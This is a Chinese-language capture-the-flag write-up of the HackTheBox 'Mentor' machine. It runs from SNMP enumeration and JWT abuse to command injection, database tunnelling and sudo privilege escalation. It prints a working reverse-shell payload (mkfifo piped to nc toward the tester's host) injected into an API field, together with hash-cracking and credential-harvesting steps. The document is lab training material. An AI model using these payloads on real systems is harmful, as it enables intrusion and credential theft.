靶机—— Mentor

admin 2023年3月28日22:48:06评论27 views1字数 11922阅读39分44秒阅读模式

title: HTB-Mentor

top: false

toc: true

mathjax: false

date: 2023-03-12 14:04:00

author: wa0er

img: /medias/article_cover/Mentor.png

password:

summary: HackTheBox-Mentor

keywords: HackTheBox

tags: HackTheBox

信息收集

nmap

┌──(root💀kali)-[~/Desktop]└─# nmap -sC -sV -oA nmap/result 10.10.11.193Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-05 19:47 ESTNmap scan report for 10.10.11.193Host is up (0.38s latency).Not shown: 998 closed portsPORT   STATE SERVICE VERSION22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   256 c7:3b:fc:3c:f9:ce:ee:8b:48:18:d5:d1:af:8e:c2:bb (ECDSA)|_  256 44:40:08:4c:0e:cb:d4:f1:8e:7e:ed:a8:5c:68:a4:f7 (ED25519)80/tcp open  http    Apache httpd 2.4.52|_http-server-header: Apache/2.4.52 (Ubuntu)|_http-title: Did not follow redirect to http://mentorquotes.htb/Service Info: Host: mentorquotes.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 74.40 seconds

开放端口:22(SSH)、80(HTTP),域名http://mentorquotes.htb/

添加域名到本地hosts文件

echo "10.10.11.193  mentorquotes.htb" >> /etc/hosts

URL访问http://mentorquotes.htb/

靶机—— Mentor

wfuzz一下子域

┌──(root💀kali)-[~/Desktop]└─# wfuzz -H "Host: FUZZ.mentorquotes.htb" --hc 302,400 -t 50 -H "User-Agent: wa0er" -c -z file,"/usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt" http://mentorquotes.htb/ /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.********************************************************* Wfuzz 3.1.0 - The Web Fuzzer                         *********************************************************
Target: http://mentorquotes.htb/Total requests: 38267
=====================================================================ID Response Lines Word Chars Payload =====================================================================
000000142: 404 0 L 2 W 22 Ch "api"
Total time: 0Processed Requests: 38267Filtered Requests: 38266Requests/sec.: 0

得api子域,将api子域添加进本地hosts文件

echo "10.10.11.193  api.mentorquotes.htb" >> /etc/hosts

访问api.mentorquotes.htb,是404

靶机—— Mentor

ffuf爆破一下api.mentorquotes.htb的目录

┌──(root💀kali)-[~/Desktop]└─# ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -u http://api.mentorquotes.htb/FUZZ -t 50
/'___ /'___ /'___ / __/ / __/ __ __ / __/ ,__\ ,__/ / ,__ _/ _/ _ _/ _ _ ____/ _ /_/ /_/ /___/ /_/
v2.0.0-dev________________________________________________
:: Method : GET :: URL : http://api.mentorquotes.htb/FUZZ :: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 50 :: Matcher : Response status: 200,204,301,302,307,401,403,405,500________________________________________________
[Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 292ms] * FUZZ: admin
[Status: 200, Size: 969, Words: 194, Lines: 31, Duration: 533ms] * FUZZ: docs
[Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 362ms] * FUZZ: users
[Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 1082ms] * FUZZ: quotes
[Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 863ms] * FUZZ: server-status
:: Progress: [38267/38267] :: Job [1/1] :: 125 req/sec :: Duration: [0:04:47] :: Errors: 0 ::

得到api.mentorquotes.htb四个目录:/admin/docs/users/quotes/server-status

api.mentorquotes.htb/admin如下

靶机—— Mentor

api.mentorquotes.htb/docs如下,用的Swagger UI,页面能看到很多API

靶机—— Mentor

可以看到这个站点的站主是james,并且他的邮箱是[email protected]

靶机—— Mentor

/auth/signup尝试注册账户,如下界面,填写email、username、password,点击Execute,同时Burp抓包

靶机—— Mentor

Burp抓包重放,如下,可看到账户已被创建

靶机—— Mentor

尝试用刚创建的账户在/auth/login登录,填写email、username、password,点击Execute,依然Burp抓包

靶机—— Mentor

Burp重放,发现返回了一串JWT(JsonWebToken,下简称JWT,JWT典型的三段结构:xxx.xxx.xxx)

靶机—— Mentor

"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InN0cmluZyIsImVtYWlsIjoid2EwZXJAZXhhbXBsZS5jb20ifQ.HfrTNgZInwCjDjfhO447ojuw5lEZWi03NmrENknZJZ8"

/users目录应该是所有用户的信息,于是在/users目录尝试登录,如果直接登录,会发现提示需要Authorization字段,那我们就抓包在请求头添加如下Authorization键值对,重放HTTP请求,发现提示只允许admin用户访问

Authorization:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InN0cmluZyIsImVtYWlsIjoid2EwZXJAZXhhbXBsZS5jb20ifQ.HfrTNgZInwCjDjfhO447ojuw5lEZWi03NmrENknZJZ8

靶机—— Mentor

然后尝试用james用户的邮箱用户名去注册,发现会提示用户已存在

靶机—— Mentor

随后进行百般尝试,发现它验证用户是否已存在的逻辑是:当email和username同时匹配到相同的值时,才会认定此用户已存在。于是尝试伪造管理员用户获取管理员JWT(这里的管理员用户推测应该是站主james或者admin)。

但随后用注册→登录(获取JWT)→/users目录尝试了以下5种组合,均提示只有admin用户能访问该资源

{    "email":"[email protected]",    "username":"wa0er",    "password":"wa0erwa0er"}
{    "email":"[email protected]",    "username":"james",    "password":"wa0erwa0er"}
{    "email":"[email protected]",    "username":"admin",    "password":"wa0erwa0er"}
{    "email":"[email protected]",    "username":"wa0er",    "password":"wa0erwa0er"}
{    "email":"[email protected]",    "username":"admin",    "password":"wa0erwa0er"}

随后整理思路,在一次nmap扫描中,看到如下信息

┌──(root💀kali)-[~/Desktop]└─# nmap -sU 10.10.11.193Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-11 21:40 ESTNmap scan report for mentorquotes.htb (10.10.11.193)Host is up (0.23s latency).Not shown: 998 closed portsPORT    STATE         SERVICE68/udp  open|filtered dhcpc161/udp open|filtered snmp
Nmap done: 1 IP address (1 host up) scanned in 1031.83 seconds

68端口(DHCPC)和161端口(SNMP)开放,DHCP可能的攻击主要就是拒绝服务和中间人攻击,用不上,那就从SNMP下手。

SNMP全称简单网络管理协议,是专门设计用于在IP网络管理网络节点(服务器、工作站、路由器、交换机及HUBS等)的一种标准协议,是一种应用层协议。通过SNMP可以访问设备信息、改写和配置设备参数等,SNMP运行在UDP161端口上,采用UDP协议在管理端和agent之间传输信息。

试试用snmpbulkwalk读取相关配置信息

https://linux.die.net/man/1/snmpbulkwalk

snmpbulkwalk -c internal -v2c 10.10.11.193 > snmpbulk_mentor注:-v 1|2c|3  指定SNMP版本-c COMMUNITY  指定community string-m MIB[:...]  指定MIB文件(此处没用到)

查看刚读取的配置信息,搜索带有login字符串的条目,发现/usr/local/bin/login.py有一个字符串kj23sadkj123as0-d213,可能是管理员的登录密码

cat snmpbulk mentor | grep login

靶机—— Mentor

我们到/auth/login目录,用james的邮箱和用户名,密码填写刚获得的密码,成功登录,获取到james账户JWT

靶机—— Mentor

"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0BtZW50b3JxdW90ZXMuaHRiIn0.peGpmshcF666bimHkYIBKQN7hj5m785uKcjwbD--Na0"
Authorization:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0BtZW50b3JxdW90ZXMuaHRiIn0.peGpmshcF666bimHkYIBKQN7hj5m785uKcjwbD--Na0

命令执行

访问/users/目录,成功拿到用户列表,主要是两个用户:james和service_acc

靶机—— Mentor

刚才我们爆破出了/admin目录,我们重新用这个JWT访问此目录,发现有两个功能目录

"admin_funcs":{    "check db connection":"/check",    "backup the application":"/backup"

靶机—— Mentor

访问/admin/check,返回Not implemented yet!

靶机—— Mentor

访问/admin/backup,返回Method Not Allowed

靶机—— Mentor

在请求头区域单击鼠标右键,选择Change request method,自动切换成POST方法,点击send发送数据包后,

可看到响应包content-type值为application/json,再加上数据部分的报错,意思就是请求包需要有带body属性的json对象

靶机—— Mentor

修改content-type值为application/json,请求头内容添加json对象,body为空就行,又提示需要path属性

靶机—— Mentor

于是在请求头内容添加body属性和path属性,返回Done!,嗯???,Done了个寂寞,应该是代入执行了

靶机—— Mentor

那我们就尝试执行命令,修改body如下,也就是ping本地主机(务必记得末尾加分号!)

在发送请求包前在本地开启tcpdump捕获数据包

tcpdump -i tun0 icmp   #只捕获tun0网卡的icmp协议数据包

靶机—— Mentor

发送请求包后,可在本地看到有数据包被捕获,说明命令被成功执行

靶机—— Mentor

那就构造如下请求包,本地开启nc监听

nc -nvlp 9898
POST /admin/backup HTTP/1.1Host: api.mentorquotes.htbUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Authorization:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0BtZW50b3JxdW90ZXMuaHRiIn0.peGpmshcF666bimHkYIBKQN7hj5m785uKcjwbD--Na0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://api.mentorquotes.htb/docsConnection: closeContent-Type: application/jsonContent-Length: 108
{ "body": "wa0er", "path":"/;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.X.X 9898 >/tmp/f;"}

成功反弹shell,获取到root权限,但看到nc提示sh: can't access tty; job control turned off,这说明根本就没有进到控制终端,可能是个虚拟环境之类的,尝试读取/root/root.txt文件发现确实没有,所以还要进一步getshell

靶机—— Mentor

/app/app目录下有db.py

靶机—— Mentor

db.py内容如下

import os
from sqlalchemy import (Column, DateTime, Integer, String, Table, create_engine, MetaData)from sqlalchemy.sql import funcfrom databases import Database
# Database url if none is passed the default one is usedDATABASE_URL = os.getenv("DATABASE_URL", "postgresql://postgres:[email protected]/mentorquotes_db")
# SQLAlchemy for quotesengine = create_engine(DATABASE_URL)metadata = MetaData()quotes = Table( "quotes", metadata, Column("id", Integer, primary_key=True), Column("title", String(50)), Column("description", String(50)), Column("created_date", DateTime, default=func.now(), nullable=False))
# SQLAlchemy for usersengine = create_engine(DATABASE_URL)metadata = MetaData()users = Table( "users", metadata, Column("id", Integer, primary_key=True), Column("email", String(50)), Column("username", String(50)), Column("password", String(128) ,nullable=False))
# Databases query builderdatabase = Database(DATABASE_URL)

为了与PostgreSQL数据库交互,需要用到chisel工具

chisel工具:https://github.com/jpillora/chisel

从本地传一个chisel

本地:python3 -m http.server 80靶机:wget http://[本地IP]/chisel

(PS:这里看到靶机IP为10.129.89.191,与之前的10.10.11.193不一致,是因为靶机中间网络中断,我切换过靶机环境,本质上他俩都是这台靶机地址)

靶机—— Mentor

将chisel复制到/tmp文件夹下,并添加可执行权限

靶机—— Mentor

本地执行:

chmod +x chisel./chisel server --port 9899 --reverse

靶机执行:

chmod +x chisel./chisel client -v 10.10.X.X:9899 R:5432:172.22.0.1:5432

靶机—— Mentor

连接数据库,密码是postgres

┌──(root💀kali)-[~/Desktop]└─# psql -h 10.10.X.X -U "postgres" -p 5432Password for user postgres: psql (13.2 (Debian 13.2-1), server 13.7 (Debian 13.7-1.pgdg110+1))Type "help" for help.
postgres=# list List of databases Name | Owner | Encoding | Collate | Ctype | Access privileges -----------------+----------+----------+------------+------------+----------------------- mentorquotes_db | postgres | UTF8 | en_US.utf8 | en_US.utf8 | postgres | postgres | UTF8 | en_US.utf8 | en_US.utf8 | template0 | postgres | UTF8 | en_US.utf8 | en_US.utf8 | =c/postgres + | | | | | postgres=CTc/postgres template1 | postgres | UTF8 | en_US.utf8 | en_US.utf8 | =c/postgres + | | | | | postgres=CTc/postgres(4 rows)
postgres=# c mentorquotes_db psql (13.2 (Debian 13.2-1), server 13.7 (Debian 13.7-1.pgdg110+1))You are now connected to database "mentorquotes_db" as user "postgres".mentorquotes_db=# d List of relations Schema | Name | Type | Owner --------+---------------+----------+---------- public | cmd_exec | table | postgres public | quotes | table | postgres public | quotes_id_seq | sequence | postgres public | users | table | postgres public | users_id_seq | sequence | postgres(5 rows)
mentorquotes_db=# select * from users; id | email | username | password ----+------------------------+-------------+---------------------------------- 1 | [email protected] | james | 7ccdcd8c05b59add9c198d492b36a503 2 | [email protected] | service_acc | 53f22d0dfa10dce7e29cd31f4f953fd8 4 | [email protected] | james | ad4ece449e52f57769466a281720b825 5 | [email protected] | wa0er | ad4ece449e52f57769466a281720b825 6 | [email protected] | admin | ad4ece449e52f57769466a281720b825(5 rows)

获取到用户密码hash值,只有前两个有用,后面的是之前自己添加的

破解一下https://crackstation.net/

靶机—— Mentor

得到svc账户的密码

123meunomeeivani

登录ssh

┌──(root💀kali)-[~/Desktop]└─# ssh [email protected][email protected]'s password: Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-56-generic x86_64)
* Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage
System information as of Thu Mar 9 09:03:14 AM UTC 2023
System load: 0.0 Usage of /: 65.3% of 8.09GB Memory usage: 15% Swap usage: 0% Processes: 243 Users logged in: 0 IPv4 address for br-028c7a43f929: 172.20.0.1 IPv4 address for br-24ddaa1f3b47: 172.19.0.1 IPv4 address for br-3d63c18e314d: 172.21.0.1 IPv4 address for br-7d5c72654da7: 172.22.0.1 IPv4 address for br-a8a89c3bf6ff: 172.18.0.1 IPv4 address for docker0: 172.17.0.1 IPv4 address for eth0: 10.10.11.193 IPv6 address for eth0: dead:beef::250:56ff:feb9:d789

0 updates can be applied immediately.

The list of available updates is more than a week old.To check for new updates run: sudo apt update
Last login: Mon Dec 12 10:22:58 2022 from 10.10.14.40svc@mentor:~$ iduid=1001(svc) gid=1001(svc) groups=1001(svc)svc@mentor:~$ pwd/home/svc

权限提升

从本地传一个linpeas工具,运行一下,分析可看到有SNMP服务的相关配置文件

靶机—— Mentor

查看/etc/snmp/snmpd.conf,可看到有个密码,站点属主是james,那应该就是james的密码(这个密码跟之前的密码不一样,可能前面的那个只是平台james管理员的密码,这个地方是linux终端james用户的密码)

svc@mentor:/tmp$ cat /etc/snmp/snmpd.conf

靶机—— Mentor

SuperSecurePassword123__

切换到james用户,执行sudo -l可看到james用户有执行/bin/sh命令的权限

svc@mentor:/tmp$ su jamesPassword: james@mentor:/tmp$ iduid=1000(james) gid=1000(james) groups=1000(james)james@mentor:/tmp$ sudo -l[sudo] password for james: Matching Defaults entries for james on mentor:    env_reset, mail_badpass,    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin, use_pty
User james may run the following commands on mentor: (ALL) /bin/sh

执行/bin/sh,成功获取root权限

james@mentor:/tmp$ sudo /bin/sh# iduid=0(root) gid=0(root) groups=0(root)

Over!

靶机—— Mentor

总结

1.

信息收集得到Swagger UI页面、SNMP服务、诸多有效目录;

2.

SNMP配置信息泄露管理员james密码;

3.

登录james用户获取管理员JWT;

4.

利用管理员JWT命令执行获取虚拟root权限;

5.

发现PostgreSQL数据库,与之交互获取ssh账户;

6.

登录ssh账户运行linpeas,从SNMP配置文件拿到james终端密码;

7.

切换james终端用户,提权获取root权限。


参考

Hackthebox Mentor Writeup:https://0xdedinfosec.vercel.app/blog/hackthebox-mentor-writeup

实战SNMP服务攻击:https://www.freebuf.com/articles/network/319234.html


原文始发于微信公众号(靶机狂魔):靶机—— Mentor

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月28日22:48:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   靶机—— Mentorhttp://cn-sec.com/archives/1635136.html

发表评论

匿名网友 填写信息